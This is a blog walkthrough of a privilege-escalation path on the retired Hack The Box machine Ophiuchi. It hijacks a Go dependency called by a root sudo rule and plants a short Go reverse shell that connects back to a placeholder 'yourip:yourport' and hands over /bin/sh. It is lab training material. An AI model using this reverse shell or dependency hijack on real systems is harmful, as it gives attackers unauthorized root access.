HTB Ophiuchi — An Alternate Path To Root

I considered writing a full walkthrough for this box as it was the first medium difficulty box I completed on my own. Once the box was retired I read some of the other walkthroughs out there and honestly the path into the box and pivoting to a user was pretty much the same across the board. I read like 5 walkthroughs including the official one released on HTB to see if there were any variations in the path to root. Surprisingly no one that shared a write up, at least those that I read, used the method I did. Because of this I thought it was worth sharing. So we’re going to fast forward and you’ve already got your initial foothold and pivoted to the admin account.

Great you made it this far, you’re now logged into the server presumably through an SSH connection with the admin account. The first thing I did once I got this far was run

sudo -l

This returns the following output:

As you can see we have the ability to run a .go program or script as root. So I took a look at the index.go file to get an idea of what it was doing. The short of it is the script was trying to deploy a webapp using as wasm file and if certain criteria were met the script would fire off a deploy.sh script. The next thing I did was attempt to run the script.

I actually ran it a few times and from a couple different locations. The first time I was in my home directory and unfortunately didn’t grab a screen shot, the second time I was in the /opt directory which yielded the same output and I did get a screenshot. Then again I ran the script from /opt/wasmer-go and I noticed there was a difference in where the instance.go file was being called from.

Executed from /opt

Executed from /opt/wasmer-go

So I decided to copy the wasmer-go directory to my home directory and execute the sudo command from there. To my pleasure instance.go was now being called from my home directory.

cp -r /opt/wasmer-go ~/wasmer-go

Executed from my home directory

So we know that when index.go is being called it’s relying on a dependency that lives in my home dir where I have write access. In the screenshot above you can see a reference to .newInstanceWithImports I grepped the instance.go file for newInstanceWithImports and sure enough it was there. So now we know there is a function from instance.go that is being called by index.go which is running with root privileges. This seems like a great place to introduce a reverse shell to me.

I opened instance.go in vi and made the following additions.

In the import statement add “os/exec” and “net”.

Next move down to the NewInstanceWithImports function and add our reverse shell. I’m not a Golang programmer so I stole someone else's. Thank you Dan Borges for a really simple reverse shell in Go.

con,_:=net.Dial("tcp","yourip:yourport");
cmd:=exec.Command("/bin/sh");
cmd.Stdin=con;
cmd.Stdout=con;
cmd.Stderr=con;
cmd.Run();

Next fire up your netcat listener on your desired port and execute the script.

Executing the command from the wasmer-go folder in my home directory.

We are root!

I then upgraded my reverse shell with python and captured the root.txt flag.

Thank you for sticking with me and hopefully this alternate method may help you think of additional ways to escalate your privileges in the future. If you liked this article and would like to be made aware of future posts you can follow me on Twitter @synsandacks

Thanks for reading!